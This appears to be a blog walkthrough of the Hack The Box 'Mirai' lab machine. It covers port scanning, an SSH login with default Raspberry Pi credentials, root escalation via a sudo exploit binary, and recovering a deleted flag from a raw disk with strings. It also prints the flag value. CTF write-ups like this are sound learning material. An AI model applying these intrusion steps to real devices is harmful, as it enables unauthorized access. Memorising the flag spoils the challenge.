Redhalo

hack the box walkthrough – Mirai machine

New easy linux HTB machine today, Mirai!

Difficulty mentioned is easy.. let’s find out.

enumeration

We don’t change now an old habit : let’s start with our nmapautomator scan:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.82.188 Full                                                                                                                                                                 
                                                                                                                                                                                                                                           
Running a Full scan on 10.129.82.188                                                                                                                                                                                                       
                                                                                                                                                                                                                                           
Host is likely running Linux                                                                                                                                                                                                               

---------------------Starting Nmap Full Scan----------------------
                                                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:41 EST
Initiating Parallel DNS resolution of 1 host. at 16:41
Completed Parallel DNS resolution of 1 host. at 16:41, 0.01s elapsed
Initiating Connect Scan at 16:41
Scanning 10.129.82.188 [65535 ports]
Discovered open port 22/tcp on 10.129.82.188
Discovered open port 53/tcp on 10.129.82.188
Discovered open port 80/tcp on 10.129.82.188
Warning: 10.129.82.188 giving up on port because retransmission cap hit (1).
Discovered open port 32400/tcp on 10.129.82.188
Connect Scan Timing: About 23.03% done; ETC: 16:43 (0:01:44 remaining)
Connect Scan Timing: About 44.31% done; ETC: 16:43 (0:01:17 remaining)
Discovered open port 1450/tcp on 10.129.82.188
Connect Scan Timing: About 67.48% done; ETC: 16:43 (0:00:44 remaining)
Discovered open port 32469/tcp on 10.129.82.188
Completed Connect Scan at 16:43, 136.87s elapsed (65535 total ports)
Nmap scan report for 10.129.82.188
Host is up (0.025s latency).
Not shown: 65089 closed ports, 440 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1450/tcp  open  dwf
32400/tcp open  plex
32469/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds

Making a script scan on extra ports: 1450, 32400, 32469
                                                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:43 EST
Nmap scan report for 10.129.82.188
Host is up (0.029s latency).

PORT      STATE SERVICE VERSION
1450/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

---------------------Finished all Nmap scans---------------------
Completed in 2 minute(s) and 30 second(s)

We have quite a few ports open on this machine..

Let’s start with the port 80. When I opened it with the web browser I got a blank page. I ran disbuster to check if any file or folder can be found.

The folder admin brings me to a Pi-hole dashboard.

Thanks to google, I have found the default credential of the SSH connection pi/raspberry

[email protected]:~$ ssh [email protected]
ssh: Could not resolve hostname h10.129.82.188: Name or service not known
[email protected]:~$ ssh [email protected]
[email protected]'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

[email protected]:~ $ whoami
pi

Privilege Escalation

A linpeas scan showed me that the user pi is member of the sudo group and I can use /tmp/shrndom with the sudo tokens exploit for privilege escalation

[email protected]:~ $ sudo /tmp/shrndom
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Where is my flag?

Oh ok… I thought I was done here..

A new linpeas scan showed me the disk mounted on /media/usbdisk

# cd /media/usbstick
# ls -al
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Oh god.. have you done James ?

So I ran the following command to recover the root.txt file :

# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b